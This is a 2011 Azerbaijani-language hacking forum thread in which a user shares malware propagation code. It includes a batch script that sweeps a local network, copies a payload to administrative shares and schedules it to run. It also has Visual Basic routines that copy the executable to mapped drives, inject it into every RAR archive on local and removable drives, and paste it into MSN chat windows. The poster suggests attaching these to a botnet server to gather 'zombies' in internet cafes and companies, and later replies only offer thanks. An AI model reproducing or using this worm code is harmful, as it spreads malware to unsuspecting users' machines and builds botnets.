Anti-armenia.ORG - Forumlar - MSN - LAN - RAR Spreader



Istifadəçi
    2011-11-21 18:59 GMT                 

MetaizM



Gold
Mesaj Sayı : 175
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   5  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Bugunki Movzuda Spreaderler Teqdim Edecem
Vallah Melumati Yazmaga Nese oxot Yoxdur+Basim Partdiyir Yaxin Zamanda Mutleq Movzu Acib Etrafli Bilgi Verecem
Basa Dusmeyenlerde Videodan Baxa Bilerler
http://www.youtube.com/watch?v=vjcBVRKCWUs&feature=related
============================================================
http://www.youtube.com/watch?v=U0EVWk7vos8
Buda Bat Script (BAT Script lOru Dilde Deyim Wifi Uzerinden Yayir LAN Uzerinden)
==>
Kod:
@Echo off
cls
rem Making sure the Schedule Service is running locally
cls
echo Making sure the Scheduler is up and running...
sc config schedule start= demand >nul
sc start schedule >nul
net start schedule >nul
cls
echo Welcome Master! I am here to serve you!
echo.
IPCONFIG |FIND "IP" > %temp%\TEMPIP.txt
FOR /F "tokens=2 delims=:" %%a in (%temp%\TEMPIP.txt) do set IP=%%a
set IP=%IP:~1%
del %temp%\TEMPIP.txt /Q
echo Local IP guess: %IP%
echo.
:pwnip
set PWNIP=
rem Let the script do it's job. Set the new time from 5 to 10 minutes later for large Networks
set /P PWNIP=[LANip]-Give the first three (3) bytes of your IP: %=%
if "%PWNIP%"=="" goto pwnip
cls
echo Current time is: %TIME%
:pwntimee
set PWNTIMEE=
rem Let the script do it's job. Set the new time from 3 to 5 minutes later
set /P PWNTIMEE=[OWNAGE]-Give the Malware-Execution time (hH:mm format): %=%
if "%PWNTIMEE%"=="" goto pwntimee
echo.
echo I'm ready to spread the shit!
echo.
pause
cls
rem Change "62" with the last IP you wanna pwn
for /L %%j in (1,1,254) do (
ping -n 1 -w 50 %PWNIP%.%%j >nul
IF ERRORLEVEL 1 (
ECHO Excluding %PWNIP%.%%j from the list...
echo ----------------------------------------------
) ELSE (
echo Uploading your Malware to %PWNIP%.%%j ...
rem Change your Malware path here
copy C:\calc.exe \\%PWNIP%.%%j\C$ /Y >nul
echo Starting the Schedule Service at %PWNIP%.%%j ...
sc \\%PWNIP%.%%j config schedule start= demand >nul
sc \\%PWNIP%.%%j start schedule >nul
echo Setting a new Scheduled Task at %PWNIP%.%%j ...
at \\%PWNIP%.%%j %PWNTIMEE% /interactive "C:\calc.exe" >nul
echo ----------------------------------------------
)
)
cls
echo NetCafe Spreader v2.0
echo Author: AnalyseR
echo email:  alienyser [at] gmail [dot] com
echo ----------------------------------------
echo Cheers to p0wnbox.com members, Greek Hacking Scene, Prince_Pwn3r, SeSp, DarkPaiN, GianKal
echo DarkDuck, RunaS, Nionios, Proinos_Jose, Santa_Cruz, Cyberia, DPunk.9090, Lari, __PotteR__
echo ...and the rest of my good friends out there.
echo.
echo.
pause
cls
@Echo on

BAT Exe Converterler Ile EXE'e Cevirib Serverinize Yapisdirib Gondere Bilersiniz
ve VB Kodunu Verim
Kod:
Public Sub LocalNetwork()

On Error Resume Next



Dim A, B, C

Set A = CreateObject("WScript.Network")

Set B = A.EnumNetworkDrives



If B.Count <> 0 Then

For C = 0 To B.Count - 1

If InStr(B.Item(C), "") <> 0 Then

FileCopy App.Path & "" & App.EXEName & ".exe", B.Item(C)

End If

Next

End If
End Sub

VB'da Yeni Modul Yaradib Kodlari elave Edib stub'unuza Yapisdirib oRdanda Server'e Gonderirsiniz
Internet Klub ve Yaxud Hansisa Sirket'de BOTNET Serverinizi Acib Kalan Zombi yigmaq Olar
RAR Spreader
Kod:
&񗝉 Module      : Rar Spread
&񗝉 DateTime    : -----
&񗝉 Coder       : Wretch-x
&񗝉 URL         : WWW.OLTAN.NeT
&񗝉               Call SearchAndInfectRars    [Starts the proccess]
&񗝉 Requirements: None
&񗝉---------------------------------------------------------------------------------------

Option Explicit

Private Declare Function GetDriveType Lib "kernel32" Alias "GetDriveTypeA" (ByVal nDrive As String) As Long
Private  Declare Function GetLogicalDriveStrings Lib "kernel32" Alias  "GetLogicalDriveStringsA" (ByVal nBufferLength As Long, ByVal lpBuffer  As String) As Long
Private Declare Function CopyFile Lib  "kernel32.dll" Alias "CopyFileA" (ByVal lpExistingFileName As String,  ByVal lpNewFileName As String, ByVal bFailIfExists As Long) As Long
Private  Declare Function GetShortPathName Lib "kernel32.dll" Alias  "GetShortPathNameA" (ByVal lpszLongPath As String, ByVal lpszShortPath  As String, ByVal cchBuffer As Long) As Long
Private Declare Function GetModuleHandle Lib "kernel32" Alias "GetModuleHandleA" (ByVal lpModuleName As String) As Long
Private  Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA"  (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As  String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal  nShowCmd As Long) As Long
Private Declare Function FindFirstFile Lib  "kernel32" Alias "FindFirstFileA" (ByVal lpFileName As String,  lpFindFileData As WIN32_FIND_DATA) As Long
Private Declare Function  FindNextFile Lib "kernel32" Alias "FindNextFileA" (ByVal hFindFile As  Long, lpFindFileData As WIN32_FIND_DATA) As Long
Private Declare Function FindClose Lib "kernel32" (ByVal hFindFile As Long) As Long

Private Const MAX_PATH = 260
Private Const INVALID_HANDLE_VALUE = -1
Private Const FILE_ATTRIBUTE_ARCHIVE = &H20
Private Const FILE_ATTRIBUTE_DIRECTORY = &H10
Private Const FILE_ATTRIBUTE_HIDDEN = &H2
Private Const FILE_ATTRIBUTE_NORMAL = &H80
Private Const FILE_ATTRIBUTE_READONLY = &H1
Private Const FILE_ATTRIBUTE_SYSTEM = &H4
Private Const FILE_ATTRIBUTE_TEMPORARY = &H100

Private Type FILETIME
    dwLowDateTime As Long
    dwHighDateTime As Long
End Type

Private Type WIN32_FIND_DATA
    dwFileAttributes As Long
    ftCreationTime As FILETIME
    ftLastAccessTime As FILETIME
    ftLastWriteTime As FILETIME
    nFileSizeHigh As Long
    nFileSizeLow As Long
    dwReserved0 As Long
    dwReserved1 As Long
    cFileName As String * MAX_PATH
    cAlternate As String * 14
End Type

Public Function SearchAndInfectRars() As Boolean
    On Error Resume Next
   
    If Dir(Environ("ProgramFiles") & "\\WinRAR\\WinRAR.exe") <> "" Then
        Dim sBuffer As String * 255
        Dim sDrives As String
        Dim lResult As Long
        Dim sDrive As String
        Dim sPos As Integer
        Dim lType As Long
   
         Call CopyFile(App.Path & "\\" & App.EXEName & ".exe",  Environ("HOMEDRIVE") & App.EXEName & ".exe", False)
   
        lResult = GetLogicalDriveStrings(Len(sBuffer), sBuffer)
        sDrives = Left$(sBuffer, lResult)

        While Len(sDrives) > 0
            sPos = InStr(sDrives, Chr$(0))
            sDrive = Left$(sDrives, sPos - 1)
            sDrives = Mid$(sDrives, sPos + 1)
       
            lType = GetDriveType(sDrive)
           
                If lType = 2 Or lType = 3 Or lType = 4 Then
                    Call FindFiles(Left$(sDrive, 2), "*.rar")
                End If
        Wend
    End If
End Function

Private Function RARSpread(ByVal WinrarPath As String, ByVal RarArchive As String, ByVal Malware As String) As Boolean
    On Error GoTo err:
    If (Dir(WinrarPath) <> "") And (Dir(RarArchive) <> "") And (Dir(Malware) <> "") Then
        Dim lRet As Long
         lRet = ShellExecute(GetModuleHandle(App.Path), "open", WinrarPath, " a  -y " & RarArchive & " " & Malware, "C:\\", 0)
            If lRet = 42 Then
                RARSpread = True
            Else
                RARSpread = False
            End If
    Else
        RARSpread = False
    End If
    Exit Function
err:
    RARSpread = False
End Function

Private Sub FindFiles(ByVal vsFolderPath As String, ByVal vsSearch As String)
    Dim WFD As WIN32_FIND_DATA
    Dim hSearch As Long
    Dim strDirName As String

    DoEvents

        If Right$(vsFolderPath, 1) <> "\\" Then
            vsFolderPath = vsFolderPath & "\\"
        End If

    hSearch = FindFirstFile(vsFolderPath & "*.*", WFD)

        If hSearch <> INVALID_HANDLE_VALUE Then GetFilesInFolder vsFolderPath, vsSearch

            Do
                If (WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) Then strDirName = TrimNulls(WFD.cFileName)
                If (strDirName <> ".") And (strDirName <> "..") Then
                    FindFiles vsFolderPath & strDirName, vsSearch
                End If
   
        Loop While FindNextFile(hSearch, WFD)
            FindClose hSearch
            Kill "C:\\" & App.EXEName & ".exe"
End Sub

Private Sub GetFilesInFolder(ByVal vsFolderPath As String, ByVal vsSearch As String)
    On Error Resume Next
    Dim WFD As WIN32_FIND_DATA
    Dim hSearch As Long
    Dim strFileName As String
    Dim lVal As Long
    Dim short_path As String
   
    If Right$(vsFolderPath, 1) <> "\\" Then
        vsFolderPath = vsFolderPath & "\\"
    End If

    hSearch = FindFirstFile(vsFolderPath & vsSearch, WFD)
 
        If hSearch <> INVALID_HANDLE_VALUE Then
            Do
                If (WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) <> FILE_ATTRIBUTE_DIRECTORY Then
                    strFileName = TrimNulls(WFD.cFileName)
                    short_path = Space$(256)
                    lVal = GetShortPathName(vsFolderPath & strFileName, short_path, Len(short_path))
                    Call  RARSpread(Environ("ProgramFiles") & "\\WinRAR\\WinRAR.exe",  Left$(short_path, lVal), Environ("HOMEDRIVE") & App.EXEName &  ".exe")
                End If
               
    Loop While FindNextFile(hSearch, WFD)
        FindClose hSearch
    End If
End Sub

Private Function TrimNulls(ByVal vsStringIn As String) As String
        If InStr(vsStringIn, Chr(0)) > 0 Then
            vsStringIn = Left$(vsStringIn, InStr(vsStringIn, Chr(0)) - 1)
        End If
    TrimNulls = vsStringIn
End Function 
d Function
[/code]
MSN Spreader
[code]
&񗝉Example:
&񗝉Use a Timer with a big Intervall
&񗝉on Tick set this: Call Spread
&񗝉Change the FilePath to your FilePath
&񗝉Have phun with it!
&񗝉--------------------------------------------------------------------------------------
&񗝉----------------DON’T FORGET TO CREDIT IF YOU USE THIS SAMPLE!-------
&񗝉-------------------------------------------------------------------------------------
Private Declare Sub Sleep Lib "kernel32" (ByVal lngMilliseconds As Long)
Public Type POINTAPI
x As Long
y As Long
End Type
Public Declare Function GetForegroundWindow Lib "user32" () As Long
Public Declare Function GetClassName Lib "user32" Alias "GetClassNameA" (ByVal Hwnd As Long, ByVal lpClassName As String, ByVal nMaxCount As Long) As Long
Private Declare Function DragQueryFile Lib "shell32.dll" Alias "DragQueryFileA" (ByVal hDrop As Long, ByVal UINT As Long, ByVal lpStr As String, ByVal ch As Long) As Long
Private Declare Function GlobalAlloc Lib "kernel32" (ByVal wFlags As Long, ByVal dwBytes As Long) As Long
Private Declare Function GlobalLock Lib "kernel32" (ByVal hMem As Long) As Long
Private Declare Function GlobalUnlock Lib "kernel32" (ByVal hMem As Long) As Long
Private Declare Sub CopyMem Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)
Private Declare Function EmptyClipboard Lib "user32" () As Long
Private Declare Function OpenClipboard Lib "user32" (ByVal Hwnd As Long) As Long
Private Declare Function CloseClipboard Lib "user32" () As Long
Private Declare Function SetClipboardData Lib "user32" (ByVal wFormat As Long, ByVal hMem As Long) As Long
Private Declare Function GetClipboardData Lib "user32" (ByVal wFormat As Long) As Long
Private Declare Function IsClipboardFormatAvailable Lib "user32" (ByVal wFormat As Long) As Long
Private Const GHND = &H42
Private Const CF_HDROP = &HF
Private Const GET_DROP_COUNT = &HFFFFFFFF
Private Type DROPFILES
pFiles As Long
pt As POINTAPI
fNC As Long
fWide As Long
End Type
Dim iCounter As Integer
Dim DF As DROPFILES
Dim strFiles As String
Dim hGlobal As Long
Dim lpGlobal As Long
Dim hDrop As Long
Dim lFiles As Long
Dim strFile As String

Public Function Spread(PathToFile As String)
Dim cClass As String
Dim cWind As Long
cClass = Space(255)
cWind = GetForegroundWindow
cWind = GetClassName(cWind, cClass, 255)
cClass = Left(cClass, cWind)
If Trim(cClass) = "IMWindowClass" Then
Sleep 500
CopyFileToMem PathToFile
PastFile
CopyFileToMem PathToFile
PastFile
Call SendKeys("^v")
End If
End Function

Function CopyFileToMem(PathToTehFileS As String)
If OpenClipboard(frmMain.Hwnd) = 0 Then
CloseClipboard
Exit Function
End If
EmptyClipboard
strFiles = PathToTehFileS & vbNullChar
hGlobal = GlobalAlloc(GHND, Len(DF) + Len(strFiles))
If hGlobal Then
lpGlobal = GlobalLock(hGlobal)
DF.pFiles = Len(DF)
Call CopyMem(ByVal lpGlobal, DF, Len(DF))
Call CopyMem(ByVal (lpGlobal + Len(DF)), ByVal strFiles, Len(strFiles))
Call GlobalUnlock(hGlobal)
SetClipboardData CF_HDROP, hGlobal
End If
CloseClipboard
End Function

Function PastFile()
If IsClipboardFormatAvailable(CF_HDROP) = 0 Then Exit Function
If OpenClipboard(frmMain.Hwnd) = 0 Then
CloseClipboard
Exit Function
End If
hDrop = GetClipboardData(CF_HDROP)
lFiles = DragQueryFile(hDrop, -1&, "", 0)
strFile = Space(260)
For iCounter = 0 To lFiles - 1
Call DragQueryFile(hDrop, iCounter, strFile, Len(strFile))
Next
CloseClipboard
End Function
[/code]

Anti-armenia.ORG
    

Istifadəçi
    2011-11-21 19:06 GMT                 

BLackB0x



İstifadəçi
Mesaj Sayı : 92
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   3  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


eXcellent Movzudur Tesekkurler Day Burda Etrafli Yazmali Ne varki Her Seyi Aciq Aydin vermisen

Anti-armenia.ORG
    

Istifadəçi
    2011-11-21 19:34 GMT                 

VusaL_R



Banned
Mesaj Sayı : 86
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş : 31
Mesaj :

Mövzunu Paylaş!


tesekkur

Anti-armenia.ORG
    

Istifadəçi
    2011-11-21 19:44 GMT                 

Mr.OpiL



Banned
Mesaj Sayı : 149
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   2  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş : 25
Mesaj :

Mövzunu Paylaş!


tewekkurler bro..

Anti-armenia.ORG
    

Istifadəçi
    2011-12-12 12:49 GMT                 

Ferid23



Admin
Mesaj Sayı : 1875
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   45  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Anti-armenia.ORG
Ölkə :
Məslək : Programmer & Defacer
Yaş : 12
Mesaj :

Mövzunu Paylaş!


Paylaşım üçün təşəkkür. Mənə lazım idi Çoxsağol.!

AZ Domaini İhbar Hattı (Azərbaycan saytlarında olan boşluqları bizə bildirin): http://anti-armenia.org/forums.php?m=posts&q=572
Qaydalar (Saytın qayda-qanunlarını oxuyaraq əməl edin)
Anti-armenia.ORG
    

Istifadəçi
    2011-12-12 15:04 GMT                 

MetaizM



Gold
Mesaj Sayı : 175
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   5  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Deymez

Anti-armenia.ORG